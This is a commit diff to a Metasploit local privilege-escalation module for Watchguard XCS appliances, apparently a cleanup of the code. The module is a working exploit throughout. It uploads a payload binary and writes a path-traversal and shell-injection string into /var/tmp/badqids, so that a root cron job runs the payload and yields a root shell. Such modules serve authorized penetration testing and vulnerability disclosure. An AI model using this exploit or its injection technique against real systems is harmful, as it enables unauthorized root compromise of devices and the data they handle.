Do watchguard_local_privesc code cleaning

Author: jvazquez-r7

modules/exploits/freebsd/misc/watchguard_local_privesc.rb

@@ -7,7 +7,10 @@
 require 'msf/core'
 
 class Metasploit4 < Msf::Exploit::Local
-  Rank = ExcellentRanking
+  # It needs 3 minutes wait time
+  # WfsDelay set to 180, so it should be a Manual exploit,
+  # to avoid it being included in automations
+  Rank = ManualRanking
 
   include Msf::Exploit::EXE
   include Msf::Post::File
@@ -27,68 +30,73 @@ def initialize(info = {})
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          ['URL','http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
+          ['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
         ],
       'Platform'       => 'bsd',
       'Arch'           => ARCH_X86_64,
-      'SessionTypes'   => [ 'shell' ],
-      'Privileged'     => false,
+      'SessionTypes'   => ['shell'],
+      'Privileged'     => true,
       'Targets'        =>
         [
           [ 'Watchguard XCS 9.2/10.0', { }]
         ],
+      'DefaultOptions' => { 'WfsDelay' => 180 },
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jun 29 2015'
     ))
   end
 
+  def setup
+    @pl = generate_payload_exe
+    if @pl.nil?
+      fail_with(Failure::BadConfig, 'Please select a native bsd payload')
+    end
+
+    super
+  end
+
   def check
     #Basic check to see if the device is a Watchguard XCS
     res = cmd_exec('uname -a')
-    return Exploit::CheckCode::Appears if res =~ /[email protected]/
+    return Exploit::CheckCode::Detected if res && res.include?('[email protected]')
 
     Exploit::CheckCode::Safe
   end
 
   def upload_payload
-    #Generates and uploads the payload to the device
     fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
-    @pl = generate_payload_exe
+
     write_file(fname, @pl)
-    return nil if not file_exist?(fname)
+    return nil unless file_exist?(fname)
     cmd_exec("chmod +x #{fname}")
-    return fname
+
+    fname
   end
 
   def exploit
-    print_status("Rooting can take up to 3 minutes.")
+    print_warning('Rooting can take up to 3 minutes.')
 
     #Generate and upload the payload
     filename = upload_payload
-    fail_with(Failure::NotFound, "Payload failed to upload") if filename.nil?
+    fail_with(Failure::NotFound, 'Payload failed to upload') if filename.nil?
     print_status("Payload #{filename} uploaded.")
 
     #Sets up empty dummy file needed for privesc
     dummy_filename = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
     cmd_exec("touch #{dummy_filename}")
-    vprint_status("Added dummy file")
+    vprint_status('Added dummy file')
 
     #Put the shell injection line into badqids
     #setup_privesc = "echo \"../../../../../..#{dummy_filename};#{filename}\" > /var/tmp/badqids"
-    badqids = write_file("/var/tmp/badqids","../../../../../..#{dummy_filename};#{filename}")
-    fail_with(Failure::NotFound, "Failed to create badqids file to exploit crontab") if badqids.nil?
-    print_status("Badqids created, waiting for vulnerable script to be called by crontab...")
+    badqids = write_file('/var/tmp/badqids', "../../../../../..#{dummy_filename};#{filename}")
+    fail_with(Failure::NotFound, 'Failed to create badqids file to exploit crontab') if badqids.nil?
+    print_status('Badqids created, waiting for vulnerable script to be called by crontab...')
     #cmd_exec(setup_privesc)
 
     #Cleanup the files we used
-    register_file_for_cleanup("/var/tmp/badqids")
+    register_file_for_cleanup('/var/tmp/badqids')
     register_file_for_cleanup(dummy_filename)
     register_file_for_cleanup(filename)
-
-    #Wait for crontab to run vulnerable script
-    select(nil,nil,nil,180) #Wait 3 minutes to ensure cron script is run
-    print_status("Ran out of time, should have root shell by now.")
-
   end
 
 end